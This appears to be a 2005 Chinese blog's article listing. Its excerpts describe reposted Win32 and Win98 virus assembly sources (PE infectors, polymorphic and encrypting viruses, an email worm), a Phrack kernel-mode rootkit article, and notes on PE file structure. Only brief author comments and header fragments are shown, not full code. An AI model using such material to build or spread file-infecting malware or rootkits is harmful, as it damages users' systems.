- 博客(67)
- 收藏
- 关注
转载 Phrack最新公布的内核态RootKit的技术细节
==Phrack Inc.== Volume 0x0b, Issue 0x3e, Phile #0x06 of 0x10 |=---------------=[ Kernel-mode backdoors for Windows NT ]=--------------=| |=-------------------------------------------------------------
2005-04-28 21:49:00 3518
原创 PE文件有效性检查源程序
.386.model flat,stdcalloption casemap:noneinclude C:/masm32/include/windows.incinclude C:/masm32/include/kernel32.incinclude C:/masm32/include/comdlg32.incinclude C:/masm32/include/user32.incincludeli
2005-04-16 14:22:00 2015
原创 确定PE文件有效性
1 检查IMAGE_DOS_HEADER结构的e_magic成员的值是否等于“MZ”,也就是检查文件头第一个字的值是否等于IMAGE_DOS_SIGNATURE。为什么这样呢?用MC_ASCII转换工具进行转换,M->77(d)->4d(h) ,Z->90(d)->5A(h),合起来就是ZM->5A4D(h),而通过查看windows.inc的等值定义IMAGE_DOS_SIGNATURE equ
2005-04-16 01:43:00 2019
原创 PE文件加载到内存的主要步骤
1 当PE文件被执行,PE加载器会首先检查DOS MZ header里的PE header偏移量。如果找到则忽视DOS stub 部分直接跳转到PE header。 2 PE 加载器会检查PE header是否有效,有效则跳到PE header的尾部。3 PE 加载器读取节表中的信息,然后采用内存文件映射的方法将这些节映射到内存,同时按照节表的属性设置内存块的属性。 4 PE 文件映射到内存后,P
2005-04-16 01:10:00 7728
转载 Win32_Redemption_9216.asm
????????????????????????????????????????????????????????????????[win32red.c]?? /* Win32.REDemption.9216 virus. (c) 1998. Jacky Qwerty/29A. Description This is a resident HLL (High Level Language) Win3
2005-04-12 01:22:00 2479 1
转载 Win32_Plexar.asm
; 屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯 ; ? Win32.Plexar >? ; Designed by LiteSys in Venezuela, South America ; ; PE/DOC/XLS/OUTLOOK Multithreaded Polymorphic Direct Action infector. ; ; Welcome to Pl
2005-04-12 01:18:00 2521
转载 Win32_Project2501.asm
comment * Name: Project 2501 OS: Win32 Coder Belial Heya , this is my first Pe-infector.Wow ,a great feeling to have finished it. Credits go out to Lord Julus and BillyBelcebub ,because of their win32
2005-04-12 01:10:00 1478
转载 Win32_Ordy.asm
comment " Win32.ordy by mort[MATRiX] - simple direct action current dir last section PE appender - using ordinal API values to access API Well, in viriis theres mostly use some stuff to find APIs no
2005-04-12 01:09:00 1243
转载 Win32_Voodoo.asm
; ============================ Win32.Voodoo_v3.1 =========================== ; Program : Voodoo v3.1 ; Description : Parasitic,crypt PE virus ; Last modified : 01.09.1999 ; Purpose : process handling
2005-04-12 01:08:00 1572
转载 Win32_Winux.asm
; +-----------------------+ ; : Win32/Linux.Winux : ; +--+----------------+---+ ; : by Benny/29A : ; +----------------+ ; ; ; ;Heya ppl, ; ;lemme introduce you my first multi-platform virus, the world
2005-04-12 01:06:00 1646
转载 Win32_Spit.asm
; ; SPIT.Win32 rev2.1 ; a Bumblebee Win32 Virus ; ; . Yeah! Its simple but FULL Win32 compatible -i think-. A non-resident ; Win32 virus using ffirst n fnext. ; . Copies into host: virus+host. When
2005-04-12 01:02:00 1745
转载 Win32_Savior.asm
;============================================================================ ; ; ; NAME: Win32.Savior v1.00 ; TYPE: Direct-action variable encrypting PE-infector. ; SIZE: Around 1850 bytes. ; AUTHOR:
2005-04-12 00:58:00 1398
转载 Win32_Screenfector.asm
; ?---------- ; Win32.Screenfector by MalFunction ; ; hi out there! this is my first little win32 infector. theres nothing ; special at it, no new technique, no new way of infecting. yes, it is ; a v
2005-04-12 00:56:00 1252
转载 Win32_Simple.asm
; [ W32.Simple by XXXXXX ] ; -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- ; THIS IS A VERY SMALL AND SIMPLE WIN32 PE INFECTOR.. IT INFECTS ONLY ; FILES IN THE CURRENT DIRECTORY.
2005-04-12 00:54:00 1285
转载 Win32_Vulcano.asm
; ??????? ??????? ??????? ; ??? ??? ??? ??? ??? ??? ; Win32.Vulcano ?????? ??????? ??????? ; by Benny/29A ??????? ??????? ??? ??? ; ??????? ??????? ??? ??? ; ; ; ;Description ;???????????? ; ; ;Hello
2005-04-12 00:49:00 2505
转载 Win32_Zipling.asm
; W32/ZipLing - ; ; First of all this is the source code to an I-Worm. I do not guarantee it works, although ; I have tested it on my system and it had seemed to work. I lost interest in it after a wh
2005-04-12 00:45:00 1696
转载 Win98.Priest.asm
; Win98.Priest .386 .model flat extrn ExitProcess:PROC KER32 equ 0bff70000h Limit equ 0000h addname equ 0004h addfun equ 0008h addord equ 000Ch create equ 0010h close equ 0014h rfile equ 0018h ffind e
2005-04-12 00:43:00 1081
转载 Win98.Yobe.24576.asm
?????????????????????????????????????????????????????????????????[yobe.asm]??? ; ??????? ??????? ??????? ; ??? ??? ??? ??? ??? ??? ; Win98.Yobe.24576 ?????? ??????? ??????? ; by Benny/29A ??????? ????
2005-04-12 00:41:00 2025
转载 win98.Milennium.asm
; 苒圹圹?苒圹圹?苒圹圹?; 圹?圹?圹?圹?圹?圹?; Win98.Milennium 苘苒圻 咣圹圹?圹圹圹?; by Benny/29A 圹圮苘?苘苘圹?圹?圹?; 圹圹圹?圹圹圹?圹?圹?; ; ; ;Authors description ;===================== ; ; ;Im very proud to introduce first multifiber
2005-04-12 00:39:00 4193
转载 Win32_Legacy.asm
; [Win32.Legacy] - MultiThreaded/Poly/EPO/MMX/RDA/AntiAV/PE/RAR/ARJ,etc. ; Copyright (c) 1999 by Billy Belcebu/iKX ; ; [ Introduction ] ; ; This is a polymorphic heavily armoured multitask virus. Its
2005-04-12 00:27:00 3905
转载 Win32_Kenston.asm
Win32.Kenston .386 locals jumps .model flat, STDCALL extrn ExitProcess : PROC org 1000h .data db "This is a virus.",0 .code progstart: push 0 call ExitProcess STARTVIRUS: call relativity relativity: p
2005-04-12 00:17:00 1306
转载 Win32_Halen.asm
; win32.Halen virus ; (C)reated by pxR[MIONS] ; January 2k+1 ? ; 哪哪哪哪哪哪哪哪哪哪哪馁 ; ; ; Uvodem ; 哪哪哪? ;Dovolte me abych vam predstavil jeden z mych lame viru :) (muj prvni pod win) ;Tohle je win32 nere
2005-04-12 00:13:00 1849
转载 Win32.Jimmy.asm
; Win32.Jimmy by [email protected] ; ; Infektion bei Win95/98/ME, WinNt4.0, WinNT2000 ; Variable Xor Encryption ; Append Infector ; ; Yes, this is my first W32.Virus .586p .model flat jumps .radix 16 ext
2005-04-12 00:11:00 1321
转载 Win32.Infinite.asm
; ;哪嫩圹嫩圹嫩圹嫩圹嫩圹目 ; 谀苘苣圹勰圹勰圹勰圹勰? [ Win32.Infinite Billy Belcebu/iKX ] ; 滥圹勰圹圹圹哪嫩圹圹哪?谀哪哪腫 1699 bytes Target - Win32 Ring3 ]哪哪哪 ; 谀圹勰圹勰圹勰圹勰圹勰?? [ 17/07/00 - Made in Valencia, Spain ] ; 滥圹勰圹勰圹勰圹勰圹勰哪?; ; ;
2005-04-12 00:10:00 1550
转载 Win32.Idele.asm
Win32.Idele----------------------------------------------------------------[IDELE.ASM]---.386p.model flatcomment $Idele virus version 1.9by Doxtor L. /[T.I], July-December 2000test version!! (infect g
2005-04-12 00:03:00 1522
转载 Win32.Hortiga.asm
; Win32.Hortiga ; ; Win32.h0rtiga Coded by |Zan [@deepzone.org] ; ; ?000 DeepZone - Digital Security Center ; ; http://www.deepzone.org ; ;-------------------------------------------------------------
2005-04-11 23:58:00 1377
转载 Win32.Hiv.asm
哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪[HIV.ASM]哪?COMMENT#谀哪哪哪哪哪哪哪哪? ? Win32.HIV ? 滥哪哪哪哪哪哪哪哪? 谀哪哪哪哪哪哪哪哪哪哪目? by Benny/29A ? 滥哪哪哪哪哪哪哪哪哪哪馁Finally I finished this virus... it took me more than 8 months to code
2005-04-11 23:52:00 2441
转载 Win32.Heathen.asm
Win32.Heathen; ---------------------------------------------------------------------------; some definitions of structuresAPI_STRUC strucOLE_MemoryAllocator dd ?GetWindowsDirectoryA dd ?CopyFileA dd ?
2005-04-11 23:43:00 1836
转载 Win32.Hatred.asm
comment $????????????????????????????????????????????????????????????????????????????Win32.HatredV.1.0????????????????????????????????????????????????????????????????????????????by Lord Julus?????????
2005-04-11 23:38:00 2488
转载 Win32.Harrier.asm
; Win32.Harrier ; title HDL - The pretty PE Polymorphic virus. ; page 52,130 ; ; *==================================================================* ; ! (c) 08-Sep-1997y by TechnoRat "95-th Harrier f
2005-04-11 23:34:00 1475
转载 Win32.Fever.asm
;============================================================================ ; ; Dengue Hemorrhagic Fever ; ; BioCoded by GriYo / 29A ; [email protected] ; ;==============================================
2005-04-11 00:20:00 3528
转载 Win32.Emotion.asm
comment * Win32.Emotion 苒圹圹?苒圹圹?苒圹圹? Disassembly by 圹?圹?圹?圹?圹?圹? Darkman/29A 苘苒圻 咣
2005-04-11 00:05:00 1141
转载 Win32.Dream.asm
;; 谀耐屯屯屯湍内哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目哪屯屯屯屯哪?; : Prizzy/29A : Win32.Dream : Prizzy/29A :; 滥耐屯屯屯湍睦哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁哪屯屯屯屯哪?;; Hello people, here is my third virus especially when it is designed for; wh
2005-04-11 00:04:00 2111
转载 Win32.Demiurg.asm
; *************************************************************************; ******************** ********************; ******************** Win32.Demiurg ********************; ******************** by
2005-04-10 23:53:00 2088
转载 Win32.Diablerie.asm
comment $ 赡哪哪哪哪哪哪哪哪??Win32.Diablerie 媚?饶履哪哪哪哪哪哪哪??饶哪哪哪哪哪哪哪哪?Version: 0.7 Author: Dr. Watcom (Valencia / SPAIN) Compiler: Borland Turbo Assembler (version 5.0r / 32bit) Type: PE-Infector (relocations
2005-04-10 23:47:00 1235
转载 Win32.Darling.asm
;============================================================================;;; NAME: Win32.Darling v1.00; TYPE: Direct-action variable-encrypting PE-infector.; SIZE: Around 1700 bytes.; AUTHOR: T-20
2005-04-10 23:28:00 1162
转载 Win32.Crypto.asm
;; 谀耐屯屯屯湍内哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目哪屯屯屯屯哪?; : Prizzy/29A : Win32.Crypto : Prizzy/29A :; 滥耐屯屯屯湍睦哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁哪屯屯屯屯哪?;; Im very proud on my very first virus at Win32 platform. It infects EXE; f
2005-04-10 23:27:00 2483
转载 Win32.Crash.asm
comment *Name: Crash OverWrite :-)Coder: BeLiALType: CompanionAnything else: NOThis is my first win32 virus.Its only acompanionvirus but it does his work verywell.Its perhaps coded not so fine butim s
2005-04-10 23:26:00 882
转载 Win98.BeGemot.8192.asm
哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪腫bg.asm]哪?; 苒圹圹?苒圹圹?苒圹圹?; 圹?圹?圹?圹?圹?圹?; Win98.BeGemot.8192 苘苒圻 咣圹圹?圹圹圹?; by Benny/29A 圹圮苘?苘苘圹?圹?圹?; 圹圹圹?圹圹圹?圹?圹?; ; ; ;Authors description ;哪哪哪哪哪哪哪哪哪哪?; ;Im very pro
2005-04-10 18:38:00 1777
转载 Win32.Clear.asm
; [ W32.clear by drcmda ] ; -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- ; SIMPLE BUT CLEAR WIN32 PE INFECTOR, USES SIMPLE XOR ENCRYPTION, ; MUTEXES AND DIRECTORY TRAVERSEL (ON
2005-04-10 18:19:00 1008
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人